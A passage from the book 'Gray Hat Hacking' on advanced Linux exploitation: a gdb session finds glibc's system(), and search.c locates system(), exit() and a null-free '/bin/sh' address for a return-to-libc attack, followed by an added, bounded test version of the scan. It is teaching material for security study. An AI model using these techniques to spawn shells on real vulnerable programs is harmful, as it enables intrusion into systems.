
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

When the program halts on the breakpoint, print the location of the glibc
function system():
BT book $ gdb -q vuln2
Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80483aa
(gdb) r
Starting program: /mnt/sda1/book/book/vuln2
Breakpoint 1, 0x080483aa in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ed86e0 <system>
(gdb) q
The program is running. Exit anyway? (y or n) y
BT book $
Gray Hat Hacking: The Ethical Hacker's Handbook
186
Chapter 8: Advanced Linux Exploits
187
PART III
Another cool way to get the locations of functions and strings in a binary is by searching
the binary with a custom program as follows:
BT book $ cat search.c
/* Simple search routine, based on Solar Designer's lpr exploit.
   Written for the 32-bit Linux the book uses: addresses are 4 bytes. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <dlfcn.h>

int step;          /* -1: scan downward from system(); +1: scan upward */
sigjmp_buf env;    /* sigsetjmp/siglongjmp so SIGSEGV is unblocked again after the jump */

/* SIGSEGV handler: the first fault (while stepping down) restarts the search
   upward; a second fault means the string is not in reach. */
void fault(int sig) {
    (void)sig;
    if (step < 0)
        siglongjmp(env, 1);
    else {
        printf("Can't find /bin/sh in libc, use env instead...\n");
        exit(1);
    }
}

int main(int argc, char **argv) {
    void *handle;
    int *sysaddr, *exitaddr;
    long shell;

    handle = dlopen(NULL, RTLD_LOCAL);           /* the running program's own symbols */
    *(void **)(&sysaddr) = dlsym(handle, "system");
    sysaddr += 4096; /* using pointer math 4096*4=16384=0x4000=base address */
    printf("system() found at %08lx\n", (unsigned long)sysaddr);
    *(void **)(&exitaddr) = dlsym(handle, "exit");
    exitaddr += 4096; /* using pointer math 4096*4=16384=0x4000=base address */
    printf("exit() found at %08lx\n", (unsigned long)exitaddr);

    /* Now search for /bin/sh using Solar Designer's approach */
    if (sigsetjmp(env, 1))
        step = 1;        /* back here after the first SIGSEGV: search upward */
    else
        step = -1;       /* first pass: search downward */
    shell = (long)sysaddr;
    signal(SIGSEGV, fault);
    do
        /* 8 bytes so the terminating NUL of "/bin/sh" is matched too */
        while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;
    /* reject a hit whose address contains a null byte and keep scanning */
    while (!(shell & 0xff) || !(shell & 0xff00) || !(shell & 0xff0000)
           || !(shell & 0xff000000));
    printf("\"/bin/sh\" found at %08lx\n", shell + 16384); /* 16384=0x4000=base addr */
    return 0;
}
The preceding program uses the dlopen and dlsym functions to handle objects and symbols
located in the binary.
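The scanning logic of search.c, as an added example that is not code from the book: the same byte-pattern search with the same null-byte rejection and the same down-then-up two-pass strategy, but run over a constructed in-memory buffer with explicit bounds instead of probing live memory until SIGSEGV, so the behaviour can be tested. The buffer contents, the base address 0xb7e00000 and the function names are assumptions made for the example; the book's address 0xb7ed86e0 is reused only to show the null-byte check passing.

```c
/* Added example, not from Gray Hat Hacking: bounded version of the
 * search.c scan. Assumes 32-bit (4-byte) addresses, as the book does. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define SAMPLE_LEN 1024   /* constructed buffer standing in for libc memory */
static unsigned char sample[SAMPLE_LEN];

/* Nonzero if any of the four bytes of a 32-bit address is zero. This is the
 * check search.c's do/while applies to every hit: a NUL inside the address
 * would end a strcpy-style copy early, so such a hit is useless. */
int addr_has_null_byte(uint32_t addr) {
    return !(addr & 0xffu) || !(addr & 0xff00u)
        || !(addr & 0xff0000u) || !(addr & 0xff000000u);
}

/* Scan buf[0..len) for pat (including its terminating NUL, as the book's
 * memcmp of 8 bytes does), starting at offset start and moving by step
 * (+1 or -1). Returns the offset of the first hit whose address base+offset
 * has no NUL byte, or -1 when the buffer edge is reached (the bounded stand-in
 * for the SIGSEGV that ends a pass in search.c). */
long find_string(const unsigned char *buf, size_t len, const char *pat,
                 size_t start, int step, uint32_t base) {
    size_t patlen = strlen(pat) + 1;
    long off = (long)start;
    while (off >= 0 && (size_t)off + patlen <= len) {
        if (memcmp(buf + off, pat, patlen) == 0
            && !addr_has_null_byte(base + (uint32_t)off))
            return off;
        off += step;
    }
    return -1;
}

/* search.c's two-pass strategy: downward from the anchor first, upward second. */
long find_string_both_ways(const unsigned char *buf, size_t len, const char *pat,
                           size_t anchor, uint32_t base) {
    long off = find_string(buf, len, pat, anchor, -1, base);
    if (off < 0)
        off = find_string(buf, len, pat, anchor, +1, base);
    return off;
}

/* Constructed sample: filler with "/bin/sh" at 0x100 (address ends in 0x00,
 * so it must be rejected) and at 0x2f0 (usable). */
const unsigned char *sample_buffer(void) {
    memset(sample, 'A', SAMPLE_LEN);
    memcpy(sample + 0x100, "/bin/sh", 8);
    memcpy(sample + 0x2f0, "/bin/sh", 8);
    return sample;
}

int main(void) {
    const uint32_t base = 0xb7e00000u;           /* assumed mapping base */
    const unsigned char *buf = sample_buffer();
    long off = find_string_both_ways(buf, SAMPLE_LEN, "/bin/sh", 0x200, base);
    if (off < 0)
        printf("\"/bin/sh\" not found without a null byte in its address\n");
    else
        printf("\"/bin/sh\" found at %08x\n", base + (uint32_t)off);
    return 0;
}
```

Starting at offset 0x200 the downward pass reaches the copy at 0x100, rejects it because 0xb7e00100 contains a zero byte, runs off the buffer, and the upward pass then returns the copy at 0x2f0; shifting the base by one byte makes the lower copy acceptable instead, which is exactly the sensitivity to load address that the book's fixed +0x4000 adjustment is working around.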

